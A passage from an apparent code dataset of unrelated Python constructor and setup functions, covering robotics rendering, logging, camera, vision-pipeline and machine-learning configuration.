list(Path(random_texture_path).glob('**/*.jpg'))))\n current_dir = osp.dirname(osp.abspath(__file__))\n self.gray_texture = osp.join(current_dir, 'images', 'gray.jpg')\n\n pybullet.setAdditionalSearchPath(pybullet_data.getDataPath())\n pybullet.setPhysicsEngineParameter(enableFileCaching=0)\n\n self.draw_camera_pos()\n self.lightDirection = [1, 1, 1]\n self.lightDistance = 1\n self.lightColor = [1, 1, 1]\n self.lightAmbientCoeff = 0.2\n self.lightDiffuseCoeff = 0.9\n self.lightSpecularCoeff = 0.9\n if use_change_light:\n self.change_light()\n self._rendered = None\n self._rendered_pos = None\n self._rendered_rot = None", "def __init__(self, level, pathname, lineno, msg, args, exc_info, func=None):\n #\n # The following statement allows passing of a dictionary as a sole\n # argument, so that you can do something like\n # logging.debug(\"a %(a)d b %(b)s\", {'a':1, 'b':2})\n # Suggested by Stefan Behnel.\n # Note that without the test for args[0], we get a problem because\n # during formatting, we test to see if the arg is present using\n # 'if self.args:'. If the event being logged is e.g. 'Value is %d'\n # and if the passed arg fails 'if self.args:' then no formatting\n # is done. For example, logger.warn('Value is %d', 0) would log\n # 'Value is %d' instead of 'Value is 0'.\n # For the use case of passing a dictionary, this should not be a problem.\n if args and len(args) == 1 and isinstance(args[0], dict) and args[0]:\n args = args[0]\n self.args = args\n self.levelno = level\n self.pathname = pathname\n self.msg = msg\n\n self.levelname = \"FOOBAR\" #getLevelName(level)\n\n try:\n self.filename = os.path.basename(pathname)\n self.module = os.path.splitext(self.filename)[0]\n except (TypeError, ValueError, AttributeError):\n self.filename = pathname\n self.module = \"Unknown module\"\n\n self.exc_info = exc_info\n self.exc_text = None # used to cache the traceback text\n self.lineno = lineno\n self.func_name = func\n self.created = time.time()\n self.asctime = time.asctime()\n # Remove milliseconds\n i = self.asctime.find(\".\")\n if i != -1: self.asctime = self.asctime[:i]", "def __init__(self):\n if not os.path.isfile(CONFIG_FILENAME):\n first_time_run()\n raise SystemExit()\n\n \"\"\"\n Init file is present, read and parse it:\n \"\"\"\n conf = configparser.ConfigParser(interpolation=configparser.ExtendedInterpolation(), inline_comment_prefixes='#')\n conf.read(CONFIG_FILENAME)\n \"\"\"\n Process certain paths:\n \"\"\"\n\n path = conf['Paths']\n self.ffc_dir = path['FlatFieldCalDir']\n self.capture_dir = path['CaptureDir']\n self.image_dir = path['ImageDir']\n\n \"\"\"\n Process options\n \"\"\"\n\n self.cal_auto_save = conf.getboolean('Options', 'CalAutoSave', fallback=True)\n self.cal_auto_load = conf.getboolean('Options', 'CalAutoLoad', fallback=True)\n self.sound_on_capture = conf.getboolean('Options', 'SoundOnCapture', fallback=True)\n self.exp_init1 = conf.getint('Options', 'ExpInit1', fallback=100)\n self.exp_init2 = conf.getint('Options', 'ExpInit2', fallback=100)\n self.black_correct = conf.getboolean('Options', 'BlackCorrect', fallback=True)\n # Setup square window, default of full-screen height\n self.tiff_seq_x_window = conf.getint('Options', 'TiffSeqXWindow', fallback=cameras.FRAME_HEIGHT)\n self.tiff_seq_y_window = conf.getint('Options', 'TiffSeqYWindow', fallback=cameras.FRAME_HEIGHT)\n self.tiff_seq_rebin = conf.getint('Options', 'TiffSeqRebin', fallback = 2)", "def __init__(self, detector):\n self.base_dir = os.path.join(os.getcwd(), cfg.local[\"BASE_DB\"])\n self.images_dir = os.path.join(self.base_dir, cfg.local[\"IMG_DIR\"])\n self.X_filename = os.path.join(self.base_dir, cfg.data[\"X_NAME\"])\n self.y_filename = os.path.join(self.base_dir, cfg.data[\"y_NAME\"])\n self.le_filename = os.path.join(self.base_dir, cfg.models[\"LE_NAME\"])\n self.detector = detector\n\n if not os.path.exists(self.base_dir):\n os.mkdir(self.base_dir)\n\n if not os.path.exists(self.images_dir):\n os.mkdir(self.images_dir)\n\n #Load basic information here\n self.__initDataFromImages() #Init before load\n self.__loadPreProcessedData()", "def setup(args):\n cfg = get_cfg()\n\n cfg.merge_from_file(model_zoo.get_config_file(args.model_zoo))\n cfg.DATASETS.TRAIN = (args.train_dataset, )\n cfg.DATASETS.TEST = (args.test_dataset, )\n cfg.DATALOADER.NUM_WORKERS = args.num_workers\n cfg.OUTPUT_DIR = args.output_dir\n os.makedirs(cfg.OUTPUT_DIR, exist_ok=True)\n\n cfg.image_w = args.size[0]\n cfg.image_h = args.size[1]\n\n cfg.MODEL.WEIGHTS = args.model_zoo_weights\n cfg.MODEL.ROI_HEADS.SCORE_THRESH_TEST = args.roi_thresh # set a custom testing threshold\n\n default_setup(cfg, args)\n return cfg", "def __init__(self, args):\n self.cropped_dir = args.cropped_dir\n self.output_dir = args.output_dir\n self.txt_info_dir = args.txt_info_dir\n\n self.HR_dim = []\n self.HR_dim.append(int(args.HR_dim.split(' ')[0]))\n self.HR_dim.append(int(args.HR_dim.split(' ')[1]))\n self.HR_dim.append(int(args.HR_dim.split(' ')[2]))\n\n self.HR_pixdim = []\n self.HR_pixdim.append(float(args.HR_pixdim.split(' ')[0]))\n self.HR_pixdim.append(float(args.HR_pixdim.split(' ')[1]))\n self.HR_pixdim.append(float(args.HR_pixdim.split(' ')[2]))", "def _generate_setup(self,num_pores,domain_size):\n logger.debug(\"generate_setup: Perform preliminary calculations\")\n if domain_size is not None and num_pores is not None:\n self._Lx = domain_size[0]\n self._Ly = domain_size[1]\n self._Lz = domain_size[2]\n self._Np = num_pores\n r\"\"\"\n TODO: Fix this, btype should be received as an argument\n \"\"\"\n self._btype = [0,0,0]\n else:\n logger.error(\"domain_size and num_pores must be specified\")\n raise Exception('domain_size and num_pores must be specified')", "def __init__(self, level, general_log_path, outputs_folder):\n self.log_level = level\n\n # self.general_log_file = general_log_path.open('w')\n self.general_log_file = GCOpen(general_log_path, 'w')\n self.general_log_file.open()\n\n self.file_outputs_dir = outputs_folder / 'output_files'\n # self.file_outputs_dir.mkdir(exist_ok=True)\n\n exp_name = str(outputs_folder).split('/')[-1]\n\n self.summary_writer = SummaryWriter(log_dir=str(TEMP_FOLDER),\n filename_suffix='.' + exp_name)\n tf_filename = find_tf_event(exp_name)\n self.sw_local_path = Path(TEMP_FOLDER) / tf_filename\n self.sw_gc_path = outputs_folder / tf_filename\n\n self.log(\"Starting new experiment at \" +\n datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\"))\n self.log(\"User: \" + getpass.getuser())\n self.log(\"Host: \" + socket.gethostname())\n\n Logger.unique_logger = self", "def __init__(self):\n parameters_list = []\n self.config_dict = self.open_config(parameters_list)\n\n # Define defaults\n self.disc_gt = 0.0\n self.disc_out = 0.0", "def __init__(self, basePath, darkframePath=None, flip_image_across_axis=None, show_image=False, save_image=False, save_img_type='.tif',\n savePath=None, savename=None, save_plot=False):\n self.basePath = basePath\n\n img, mean, std = calculate_darkfield(self.basePath, darkframePath=darkframePath, flip_image_axes=flip_image_across_axis, show_image=show_image, save_image=save_image, save_img_type=save_img_type,\n savePath=savePath, savename=savename, save_plot=save_plot)\n\n self.img = img\n self.mean = mean\n self.std = std", "def __init__(self, config):\n\n self.root = config.root\n self.pidfile = config.pidfile\n self.log_conf = config.logging", "def __init__(self,\n config_file=None,\n input_path=None,\n output_format=None,\n input_format=None,\n context='',\n ):\n\n absolute_path = path.join(context, config_file)\n import_dir_path = path.dirname(absolute_path)\n import_filename = path.basename(absolute_path)\n\n root_configs = {\n 'imports': [\n import_filename\n ],\n 'parameters': {\n 'input': {},\n 'output': {}\n },\n }\n\n if input_path is not None:\n root_configs['parameters']['input']['path'] = input_path\n\n if input_format is not None:\n root_configs['parameters']['input']['format'] = input_format\n\n if output_format is not None:\n root_configs['parameters']['output']['format'] = output_format\n\n self.configs = Config(import_dir_path, configs=root_configs)\n\n try:\n self.input_dir_path = path.join(context, self.params('input', 'path'))\n except Exception as e:\n Logger.debug(e)\n Logger.error('inp_path_missing')\n\n try:\n self.configs.get('parameters', 'output', 'path')\n except Exception as e:\n # setting the default output folder\n # this could be generalized and encapsulated as a setter on the config class\n self.configs.configs['parameters']['output']['path'] = 'output'\n self.configs.config_paths['parameters']['output']['path'] = context\n\n reader = self.params('input', 'format')\n if not is_str(reader) and issubclass(reader, Reader):\n self.module_loader.set_reader(reader)\n else:\n try:\n self.module_loader.load_reader(reader)\n Logger.info('input_format_detected', self.params('input', 'format'))\n except KeyError as e:\n Logger.debug(e)\n Logger.error('inp_format_missing')\n except Exception as e:\n Logger.debug(e)\n Logger.error('bad_inp_format', self.params('input', 'format'), str(e))\n\n writer = self.params('output', 'format')\n if not is_str(writer) and issubclass(writer, Writer):\n self.module_loader.set_writer(writer)\n else:\n try:\n self.module_loader.load_writer(writer)\n Logger.info('output_format_detected', self.params('output', 'format'))\n except KeyError as e:\n Logger.debug(e)\n Logger.error('out_format_missing')\n except Exception as e:\n Logger.debug(e)\n Logger.error('bad_out_format', self.params('output', 'format'), str(e))", "def __init__(self, **kwargs):\n super(ImageExporter, self).__init__(**kwargs)", "def init_all_params(self):\n self.annotations_timestamp = 0\n # self.annotations_offset = 0\n # self.annotation_offset_text.configure(text='Current: %d' % self.annotations_offset)\n self.annotations_timestamp_text.configure(text='Annotation timestamp:\\n %d' % self.annotations_timestamp)\n self.annotations_timestamp_text.grid(sticky=\"W\", row=9, column=0, columnspan=10)\n # set text frames\n # self.annotations_offset_entry.delete(0, 'end')\n # self.annotations_offset_entry.insert(0, str(self.annotations_offset))\n self.current_frame_entry.delete(0, 'end')\n self.current_frame_entry.insert(0, str(self.vid.frame_number))", "def __init__(self, run_config):\n print('Initializing logs...')\n log_root = run_config['log_root_path']\n self._save_iter = run_config['save_iter']\n self._best_epoch = False\n if run_config['resume_path']:\n # resume an old experiment\n self.log_dir = run_config['resume_path']\n if os.path.exists(os.path.join(log_root, self.log_dir)):\n self.log_path = os.path.join(log_root, self.log_dir)\n print(' Resuming experiment ' + self.log_dir)\n else:\n raise Exception('Experiment folder ' + self.log_dir + ' not found.')\n else:\n # start a new experiment\n if 'log_dir' not in run_config:\n self.log_dir = ''\n else:\n self.log_dir = run_config['log_dir']\n self.log_dir += strftime(\"%b_%d_%Y_%H_%M_%S\") + '/'\n self.log_path = os.path.join(log_root, self.log_dir)\n os.makedirs(self.log_path)\n os.system(\"rsync -au --include '*/' --include '*.py' --exclude '*' . \" + self.log_path + \"source\")\n os.makedirs(os.path.join(self.log_path, 'metrics'))\n os.makedirs(os.path.join(self.log_path, 'checkpoints'))\n self.epoch = 1\n print(' Starting experiment ' + self.log_dir)", "def __init__(self, **kwargs):\n configPath = kwargs.get(\"configPath\", \"exdb-config-example.yml\")\n self.__configName = kwargs.get(\"configName\", \"site_info_remote_configuration\")\n mockTopPath = kwargs.get(\"mockTopPath\", None)\n self.__cfgOb = ConfigUtil(configPath=configPath, defaultSectionName=self.__configName, mockTopPath=mockTopPath)\n self.__workPath = kwargs.get(\"workPath\", HERE)\n self.__cachePath = kwargs.get(\"cachePath\", os.path.join(self.__workPath, \"CACHE\"))\n #\n self.__stashRemotePrefix = kwargs.get(\"stashRemotePrefix\", None)\n #\n self.__debugFlag = kwargs.get(\"debugFlag\", False)\n self.__startTime = time.time()\n if self.__debugFlag:\n logger.setLevel(logging.DEBUG)\n logger.debug(\"Starting at %s\", time.strftime(\"%Y %m %d %H:%M:%S\", time.localtime()))\n #", "def __init__(self, log_dir, schedule):\n \n # Save parameters as internal members\n self.log_dir = log_dir\n self.schedule = schedule\n \n # Create a file writer for TensorBoard logs\n self.file_writer = tf.summary.create_file_writer(log_dir)\n self.file_writer.set_as_default()", "def __init__(self, config, stats):\n self.config = config\n self.stats = stats\n self.on_map = False", "def _setupConfigAnnotation(self):\n annotations = IAnnotations(self)\n settings = annotations.get(\"PLOMINOFIELDCONFIG\", None)\n if not settings:\n annotations[\"PLOMINOFIELDCONFIG\"] = PersistentDict()", "def __init__(self, cfg):\r\n\r\n\t\tself.image_size = cfg.MODEL.INPUT.IMAGE_SIZE\r\n\t\tanchor_config = cfg.MODEL.ANCHORS\r\n\t\tself.feature_maps = anchor_config.FEATURE_MAPS\r\n\t\tself.min_sizes = anchor_config.MIN_SIZES\r\n\t\tself.max_sizes = anchor_config.MAX_SIZES \r\n\t\tself.aspect_ratios = anchor_config.ASPECT_RATIOS\r\n\t\tself.clip = anchor_config.CLIP", "def initialise(self):\n self.logger.debug(\" %s [GenerateNextPose::initialise()]\" % self.name)", "def setUp(self):\r\n center = [1,1]\r\n size = 1\r\n self.imageinfo = ImageInfo(center, size)", "def setUp(self):\r\n center = [1,1]\r\n size = 1\r\n self.imageinfo = ImageInfo(center, size)", "def setUp(self):\r\n center = [1,1]\r\n size = 1\r\n self.imageinfo = ImageInfo(center, size)", "def setUp(self):\r\n center = [1,1]\r\n size = 1\r\n self.imageinfo = ImageInfo(center, size)", "def setUp(self):\r\n center = [1,1]\r\n size = 1\r\n self.imageinfo = ImageInfo(center, size)", "def create_base_image(self, builder, template, parameters):", "def __init__(self):\n\n # Filter parameters\n self.p_bp_filter = [2.0, 16.0, 2]\n self.s_bp_filter = [2.0, 12.0, 2]\n\n # Onset window parameters\n self.p_onset_win = [0.2, 1.0]\n self.s_onset_win = [0.2, 1.0]\n\n # Traveltime lookup table decimation factor\n self.decimate = [1, 1, 1]\n\n # Time step for continuous compute in detect\n self.time_step = 120.\n\n # Data sampling rate\n self.sampling_rate = 50\n\n # Centred onset function override -- None means it will be\n # automatically set in detect() and locate()\n self.onset_centred = None\n\n # Pick related parameters\n self.pick_threshold = 1.0\n self.picking_mode = \"Gaussian\"\n self.fraction_tt = 0.1\n\n # Marginal window\n self.marginal_window = 2.\n\n # Default pre-pad for compute\n self.pre_pad = None\n\n # Number of cores to perform detect/locate on\n self.n_cores = 1\n\n # Toggle whether to incrementally write .scanmseed in detect()\n self.continuous_scanmseed_write = False\n\n # Plotting toggles\n self.plot_event_summary = True\n self.plot_station_traces = False\n self.plot_coal_video = False\n\n # Saving toggles\n self.write_4d_coal_grid = False\n self.write_cut_waveforms = False\n self.cut_waveform_format = \"MSEED\"\n self.pre_cut = None\n self.post_cut = None\n\n # xy files for plotting\n self.xy_files = None", "def __init__(self, name=\"logger\", loglevel=3, persist=True, flush=True, rotation_interval=1, format=\"text\"):\n\n self.name = name\n self.loglevel = loglevel\n self.persist = persist\n self.flush = flush\n self.format = format\n \n self.rotation_interval = rotation_interval # (int) days\n\n self.initialize()", "def _configure_vision(self, config, level):\n self._register_or_update_all_publishers(config)\n\n # Set max number of balls\n self._max_balls = config['ball_candidate_max_count']\n\n # Set some thresholds\n # Brightness threshold which determines if the camera cap is on the camera.\n self._blind_threshold = config['vision_blind_threshold']\n # Threshold for ball candidates\n self._ball_candidate_threshold = config['ball_candidate_rating_threshold']\n # Maximum offset for balls over the convex field boundary\n self._ball_candidate_y_offset = config['ball_candidate_field_boundary_y_offset']\n # Maximum offset for balls over the convex field boundary\n self._goal_post_field_boundary_y_offset = config['goal_post_field_boundary_y_offset']\n\n # Which line type should we publish?\n self._use_line_points = config['line_detector_use_line_points']\n self._use_line_mask = config['line_detector_use_line_mask']\n\n # Should the debug image be published?\n if ros_utils.config_param_change(self._config, config, 'vision_publish_debug_image'):\n if config['vision_publish_debug_image']:\n rospy.loginfo('Debug images are enabled', logger_name=\"vision\")\n else:\n rospy.loginfo('Debug images are disabled', logger_name=\"vision\")\n # Create debug drawer\n self._debug_image_creator = debug.DebugImage(config['vision_publish_debug_image'])\n '''\n # Should the fcnn output (only under the field boundary) be published?\n if ros_utils.config_param_change(self._config, config, 'ball_fcnn_publish_output'):\n self._ball_fcnn_publish_output = config['ball_fcnn_publish_output']\n if self._ball_fcnn_publish_output:\n rospy.loginfo('ball FCNN output publishing is enabled', logger_name=\"vision\")\n else:\n rospy.loginfo('ball FCNN output publishing is disabled', logger_name=\"vision\")\n\n # Should the whole fcnn output be published?\n if ros_utils.config_param_change(self._config, config, 'ball_fcnn_publish_debug_img'):\n self._publish_fcnn_debug_image = config['ball_fcnn_publish_debug_img']\n if self._publish_fcnn_debug_image:\n rospy.loginfo('Ball FCNN debug image publishing is enabled', logger_name=\"vision_fcnn\")\n else:\n rospy.loginfo('Ball FCNN debug image publishing is disabled', logger_name=\"vision_fcnn\")\n '''\n # Should the HSV mask images be published?\n if ros_utils.config_param_change(self._config, config, 'vision_publish_HSV_mask_image'):\n self._publish_HSV_mask_image = config['vision_publish_HSV_mask_image']\n if self._publish_HSV_mask_image:\n rospy.loginfo('HSV mask image publishing is enabled', logger_name=\"vision_hsv_color_detector\")\n else:\n rospy.loginfo('HSV mask image publishing is disabled', logger_name=\"vision_hsv_color_detector\")\n\n # Should the (dynamic color lookup table-) field mask image be published?\n if ros_utils.config_param_change(self._config, config, 'vision_publish_field_mask_image'):\n self._publish_field_mask_image = config['vision_publish_field_mask_image']\n if self._publish_field_mask_image:\n rospy.loginfo('(Dynamic color lookup table-) Field mask image publishing is enabled', logger_name=\"dynamic_color_lookup_table\")\n else:\n rospy.loginfo('(Dynamic color lookup table-) Field mask image publishing is disabled', logger_name=\"dynamic_color_lookup_table\")\n\n # Set the white color detector\n if ros_utils.config_param_change(self._config, config, r'^white_color_detector_'):\n if config['white_color_detector_use_color_lookup_table']:\n self._white_color_detector = color.PixelListColorDetector(config, self._package_path, 'white_color_detector_color_lookup_table_path')\n else:\n self._white_color_detector = color.HsvSpaceColorDetector(config, \"white\")\n\n # Set the red color detector\n if ros_utils.config_param_change(self._config, config, r'^red_color_detector_'):\n self._red_color_detector = color.HsvSpaceColorDetector(config, \"red\")\n\n # Set the blue color detector\n if ros_utils.config_param_change(self._config, config, r'^blue_color_detector_'):\n self._blue_color_detector = color.HsvSpaceColorDetector(config, \"blue\")\n\n # Check if params changed\n if ros_utils.config_param_change(self._config, config,\n r'^field_color_detector_|dynamic_color_lookup_table_') and not config['field_color_detector_use_hsv']:\n # Check if the dynamic color lookup table field color detector or the static field color detector should be used\n if config['dynamic_color_lookup_table_active']:\n # Set dynamic color lookup table field color detector\n self._field_color_detector = color.DynamicPixelListColorDetector(\n config,\n self._package_path)\n else:\n # Unregister old subscriber\n if self._sub_dynamic_color_lookup_table_msg_topic is not None:\n # self._sub_dynamic_color_lookup_table_msg_topic.unregister() # Do not use this method, does not work\n self._sub_dynamic_color_lookup_table_msg_topic = None\n # Set the static field color detector\n self._field_color_detector = color.PixelListColorDetector(\n config,\n self._package_path)\n\n # Check if params changed\n if ros_utils.config_param_change(self._config, config,\n r'^field_color_detector_|field_color_detector_use_hsv') and config['field_color_detector_use_hsv']:\n # Unregister old subscriber\n if self._sub_dynamic_color_lookup_table_msg_topic is not None:\n # self._sub_dynamic_color_lookup_table_msg_topic.unregister() # Do not use this method, does not work\n self._sub_dynamic_color_lookup_table_msg_topic = None\n\n # Override field color hsv detector\n self._field_color_detector = color.HsvSpaceColorDetector(config, \"field\")\n # Get field boundary detector class by name from _config\n field_boundary_detector_class = field_boundary.FieldBoundaryDetector.get_by_name(\n config['field_boundary_detector_search_method'])\n\n # Set the field boundary detector\n self._field_boundary_detector = field_boundary_detector_class(\n config,\n self._field_color_detector)\n\n # Set the line detector\n self._line_detector = lines.LineDetector(\n config,\n self._white_color_detector,\n self._field_color_detector,\n self._field_boundary_detector)\n\n # Set the obstacle detector\n self._obstacle_detector = obstacle.ObstacleDetector(\n config,\n self._field_boundary_detector)\n\n # If dummy ball detection is activated, set the dummy ballfinder as ball detector\n if config['neural_network_type'] == 'dummy':\n self._ball_detector = candidate.DummyCandidateFinder()\n # If we don't use YOLO set the conventional goalpost detector.\n self._goalpost_detector = obstacle.ColorObstacleDetector(\n self._obstacle_detector,\n self._white_color_detector,\n threshold=config['obstacle_color_threshold'])\n '''\n # Check if the fcnn is activated\n if config['neural_network_type'] == 'fcnn':\n # Check if its the first callback, the fcnn is newly activated or the model has changed\n if ros_utils.config_param_change(self._config, config, ['fcnn_model_path', 'neural_network_type']):\n # Build absolute model path\n ball_fcnn_path = os.path.join(self._package_path, 'models', config['fcnn_model_path'])\n # Check if it exists\n if not os.path.exists(os.path.join(ball_fcnn_path, \"model_final.index\")):\n rospy.logerr('AAAAHHHH! The specified fcnn model file doesn\\'t exist! Maybe its a YOLO model? Look twice.', logger_name=\"vision_fcnn\")\n else:\n self._ball_fcnn = live_fcnn_03.FCNN03(ball_fcnn_path)\n rospy.loginfo(\"FCNN vision is running now\", logger_name=\"vision_fcnn\")\n #Check if ball_fcnn _config or the neural network type has changed\n if ros_utils.config_param_change(self._config, config, r'^ball_fcnn_') or \\\n ros_utils.config_param_change(self._config, config, 'neural_network_type'):\n # Set fcnn handler\n self._ball_detector = fcnn_handler.FcnnHandler(\n config,\n self._ball_fcnn)\n # When using the FCNN, set the conventional goalpost detector.\n self._goalpost_detector = obstacle.ColorObstacleDetector(\n self._obstacle_detector,\n self._white_color_detector,\n threshold=config['obstacle_color_threshold'])\n '''\n # Check if the yolo ball/goalpost detector is activated and if the non tpu version is used\n if config['neural_network_type'] in ['yolo_opencv', 'yolo_darknet']:\n if ros_utils.config_param_change(self._config, config, ['yolo_darknet_model_path', 'neural_network_type']):\n # Build absolute model path\n yolo_darknet_model_path = os.path.join(self._package_path, 'models', config['yolo_darknet_model_path'])\n # Check if it exists\n if not os.path.exists(os.path.join(yolo_darknet_model_path, \"yolo_weights.weights\")):\n rospy.logerr('The specified yolo darknet model file doesn\\'t exist! Maybe its a fcnn model?', logger_name=\"vision_yolo\")\n else:\n # Decide which yolo implementation should be used\n if config['neural_network_type'] == 'yolo_opencv':\n # Load OpenCV implementation (uses OpenCL)\n self._yolo = yolo_handler.YoloHandlerOpenCV(config, yolo_darknet_model_path)\n elif config['neural_network_type'] == 'yolo_darknet':\n # Load Darknet implementation (uses CUDA)\n self._yolo = yolo_handler.YoloHandlerDarknet(config, yolo_darknet_model_path)\n rospy.loginfo(config['neural_network_type'] + \" vision is running now\", logger_name=\"vision_yolo\")\n\n # For other changes only modify the config\n elif ros_utils.config_param_change(self._config, config, r'yolo_'):\n self._yolo.set_config(config)\n\n # Set both ball and goalpost detector\n self._ball_detector = yolo_handler.YoloBallDetector(config, self._yolo)\n self._goalpost_detector = yolo_handler.YoloGoalpostDetector(config, self._yolo)\n # Check if we use the yolo robot detection\n if \"robot\" in self._yolo.get_classes():\n self._obstacle_detector = yolo_handler.YoloRobotDetector(config, self._yolo)\n\n # Check if tpu version of yolo ball/goalpost detector is used\n if config['neural_network_type'] in ['yolo_ncs2']:\n if ros_utils.config_param_change(self._config, config, ['neural_network_type', 'yolo_openvino_model_path']):\n # Build absolute model path\n yolo_openvino_model_path = os.path.join(self._package_path, 'models', config['yolo_openvino_model_path'])\n # Check if it exists\n if not os.path.exists(os.path.join(yolo_openvino_model_path, \"yolo.bin\")) \\\n or not os.path.exists(os.path.join(yolo_openvino_model_path, \"yolo.xml\")):\n rospy.logerr('The specified yolo openvino model file doesn\\'t exist! Maybe its a fcnn model?', logger_name=\"vision_yolo\")\n else:\n self._yolo = yolo_handler.YoloHandlerNCS2(config, yolo_openvino_model_path)\n rospy.loginfo(config['neural_network_type'] + \" vision is running now\", logger_name=\"vision_yolo\")\n # For other changes only modify the config\n elif ros_utils.config_param_change(self._config, config, r'yolo_'):\n self._yolo.set_config(config)\n\n # Set both ball and goalpost detector\n self._ball_detector = yolo_handler.YoloBallDetector(config, self._yolo)\n self._goalpost_detector = yolo_handler.YoloGoalpostDetector(config, self._yolo)\n # Check if we use the yolo robot detection\n if \"robot\" in self._yolo.get_classes():\n self._obstacle_detector = yolo_handler.YoloRobotDetector(config, self._yolo)\n\n # Set the other obstacle detectors\n self._red_obstacle_detector = obstacle.ColorObstacleDetector(\n self._obstacle_detector,\n self._red_color_detector,\n threshold=config['obstacle_color_threshold'],\n subtractors=[self._goalpost_detector])\n self._blue_obstacle_detector = obstacle.ColorObstacleDetector(\n self._obstacle_detector,\n self._blue_color_detector,\n threshold=config['obstacle_color_threshold'],\n subtractors=[self._red_obstacle_detector, self._goalpost_detector])\n self._unknown_obstacle_detector = obstacle.ColorObstacleDetector(\n self._obstacle_detector,\n threshold=config['obstacle_color_threshold'],\n subtractors=[self._red_obstacle_detector, self._blue_obstacle_detector, self._goalpost_detector])\n\n self._register_or_update_all_subscribers(config)\n\n # Define Modules that should run their calculations (modules should exist, therefore its located here)\n self._conventional_modules = [\n self._field_color_detector,\n self._white_color_detector,\n self._red_color_detector,\n self._blue_color_detector,\n self._unknown_obstacle_detector,\n self._obstacle_detector,\n self._line_detector,\n ]\n\n # Publish Config-message (mainly for the dynamic color lookup table node)\n ros_utils.publish_vision_config(config, self._pub_config)\n\n # The old _config gets replaced with the new _config\n self._config = config", "def __init__(self, doc_format=None, angle=None, width=None, height=None, center=None, left_bottom=None, left_top=None, right_bottom=None, right_top=None, dpi=None, local_vars_configuration=None): # noqa: E501 # noqa: E501\n if local_vars_configuration is None:\n local_vars_configuration = Configuration()\n self.local_vars_configuration = local_vars_configuration\n\n self._doc_format = None\n self._angle = None\n self._width = None\n self._height = None\n self._center = None\n self._left_bottom = None\n self._left_top = None\n self._right_bottom = None\n self._right_top = None\n self._dpi = None\n self.discriminator = None\n\n if doc_format is not None:\n self.doc_format = doc_format\n if angle is not None:\n self.angle = angle\n if width is not None:\n self.width = width\n if height is not None:\n self.height = height\n if center is not None:\n self.center = center\n if left_bottom is not None:\n self.left_bottom = left_bottom\n if left_top is not None:\n self.left_top = left_top\n if right_bottom is not None:\n self.right_bottom = right_bottom\n if right_top is not None:\n self.right_top = right_top\n if dpi is not None:\n self.dpi = dpi", "def __init__(self, configFileName):\n config = yaml.load(open(configFileName, \"r\"))\n\n # Logging\n self.log_level = logging.DEBUG\n if config['log_level'] == 'INFO':\n self.log_level = logging.INFO\n if config['log_level'] == 'ERROR':\n self.log_level = logging.ERROR\n\n # CPU count\n self.multipleOfCPUCount = float(config['multiple_of_cpu_count'])\n\n # Sliding window creation:\n slidingWindow = config['sliding_window']\n sw_folders = slidingWindow['folders']\n self.sw_folders_frame = sw_folders['frame_output']\n self.sw_folders_patch = sw_folders['patch_output']\n self.sw_folders_json = sw_folders['json_output']\n self.sw_folders_leveldb = sw_folders['levedb_output']\n self.sw_folders_video = sw_folders['video_output']\n self.sw_folders_numpy = sw_folders['numpy_output']\n\n self.sw_frame_density = int(slidingWindow['frame_density'])\n self.sw_patchWidth = int(slidingWindow['output_width'])\n self.sw_patchHeight = int(slidingWindow['output_height'])\n self.sw_xStride = int(slidingWindow['x_stride'])\n self.sw_yStride = int(slidingWindow['y_stride'])\n \n self.sw_scales = []\n sw_temp_scales = slidingWindow['scaling']\n for sw_scale in sw_temp_scales:\n self.sw_scales = self.sw_scales + [float(sw_scale)]\n\n # Caffe input\n caffeInput = config['caffe_input']\n self.ci_modelFile = caffeInput['model_file']\n self.ci_video_prototxtFile = caffeInput['video_prototxt_file']\n self.ci_deploy_prototxtFile = caffeInput['deploy_prototxt_file']\n self.ci_numFramesPerLeveldb = caffeInput['num_frames_per_leveldb']\n self.ci_numConcurrentLeveldbs = caffeInput['num_concurrent_leveldbs']\n self.ci_maxLeveldbSizeMB = caffeInput['max_leveldb_size_mb']\n self.ci_videoFrameNumberStart = caffeInput['video_frame_number_start']\n self.ci_useGPU = caffeInput['use_gpu'] == True\n self.ci_saveVideoHeatmap = caffeInput['save_video_heatmap'] == True\n self.ci_allClassIds = caffeInput['all_classes']\n self.ci_backgroundClassIds = caffeInput['background_classes']\n self.ci_nonBackgroundClassIds = [x for x in self.ci_allClassIds if x not in self.ci_backgroundClassIds]\n\n # Post processing\n postProcessing = config['post_processing']\n self.pp_detectorThreshold = postProcessing['detector_threshold']\n\n # Curation\n curation = config['curation']\n self.cr_curationNumOfSets = curation['num_of_sets']\n self.cr_curationNumOfPatchPerSet = curation['num_of_patch_per_set']\n\n # PeaksExtractor config - not exposed to config.yaml\n # Connectedness of labeled example - have a full matrix structure\n self.pe_binaryStructure = ndimage.morphology.generate_binary_structure(2,2)\n # if the intersection between candidate labeled bbox and proposed subsume bbox\n # is more than 70%, then subsume the candidate labeled bbox\n self.pe_maxCandidateIntersectionDiff = 0.7\n # allow no more than 90% of intersection between subsumed boxes\n self.pe_maxSubsumedIntersectionDiff = 0.9\n # thresholds to subsample candidate labeled bbox prior to showing to user\n self.pe_curationPatchThresholds = [0.98, 0.9, 0.8, 0.7, 0.6, 0.5, 0.4, 0.3, 0.2, 0.1]", "def __init__(self, output_dir, fstype, num_disks, num_dirs):\n super(PostMarkTest, self).__init__(fstype, num_disks)\n self.num_dirs = num_dirs\n self.output_dir = output_dir\n self.configurations = []", "def __init__(self, **kwargs):\n super(MBTilesBuilder, self).__init__(**kwargs)\n self.mbtiles_output = kwargs.get('mbtiles_output', DEFAULT_MBTILES_OUTPUT)\n # Gather tiles for mbutil\n basename, ext = os.path.splitext(os.path.basename(self.mbtiles_output))\n self.tmp_dir = kwargs.get('tmp_dir', DEFAULT_TMP_DIR)\n self.tmp_dir = os.path.join(self.tmp_dir, basename)\n self.tile_format = kwargs.get('tile_format', DEFAULT_TILE_FORMAT)\n # Number of tiles in total\n self.nbtiles = 0\n self._bboxes = []\n self._metadata = []\n self.verbose=False\n self.request_url=\"\"", "def __init__(self, height, width):\n # number of keypoint kind\n self.kpn = 4\n # max output object in one image\n self.maxDet = 20\n # object detect threshold, confidence\n self.obj_thr = 0.5\n # peak detect threshold, unit pixel\n self.peak_thr = 0.5\n # see threshold\n self.see_thr = 0.8\n # peak close threshold, unit pixel\n self.close_thr = 1.0\n self.height = height\n self.width = width\n # assit array\n self.x_array = np.tile(np.arange(self.width), (self.height, 1))\n self.y_array = np.tile(np.arange(self.height).reshape(-1, 1),\n (1, self.width))", "def __init__(self,config,typ='train'):\n\n self._config = config\n self.type = typ\n self.reader = JsonlReader(self._config.annotations.as_dict()[typ])\n self.annotations = self.reader.read()\n self.transform 